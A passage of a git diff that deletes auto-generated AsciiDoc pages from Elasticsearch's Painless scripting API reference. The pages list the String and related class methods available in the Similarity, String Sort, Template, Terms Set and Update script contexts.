auto-generated. Do not edit. - -[[painless-api-reference-similarity]] -=== Similarity API - -The following specialized API is available in the Similarity context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity/packages.asciidoc deleted file mode 100644 index 6bd05a8f495..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-similarity-java-lang"] -=== Similarity API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-similarity-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-string-sort/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-string-sort/index.asciidoc deleted file mode 100644 index bf6121a8d99..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-string-sort/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-string-sort]] -=== String Sort API - -The following specialized API is available in the String Sort context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-string-sort/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-string-sort/packages.asciidoc deleted file mode 100644 index af4f941bedd..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-string-sort/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-string-sort-java-lang"] -=== String Sort API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-string-sort-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-string-sort-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== String Sort API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-string-sort-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-string-sort-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== String Sort API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-string-sort-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-string-sort-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-template/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-template/index.asciidoc deleted file mode 100644 index b53ce4bfea8..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-template/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-template]] -=== Template API - -The following specialized API is available in the Template context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-template/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-template/packages.asciidoc deleted file mode 100644 index 4581bab8450..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-template/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-template-java-lang"] -=== Template API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-template-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-terms-set/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-terms-set/index.asciidoc deleted file mode 100644 index 3ed5661d910..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-terms-set/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-terms-set]] -=== Terms Set API - -The following specialized API is available in the Terms Set context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-terms-set/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-terms-set/packages.asciidoc deleted file mode 100644 index 65c8db7af8c..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-terms-set/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-terms-set-java-lang"] -=== Terms Set API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-terms-set-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-update/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-update/index.asciidoc deleted file mode 100644 index 139ab5d4984..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-update/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-update]] -=== Update API - -The following specialized API is available in the Update context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-update/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-update/packages.asciidoc deleted file mode 100644 index fa4874dc262..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-update/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-update-java-lang"] -=== Update API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-update-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String 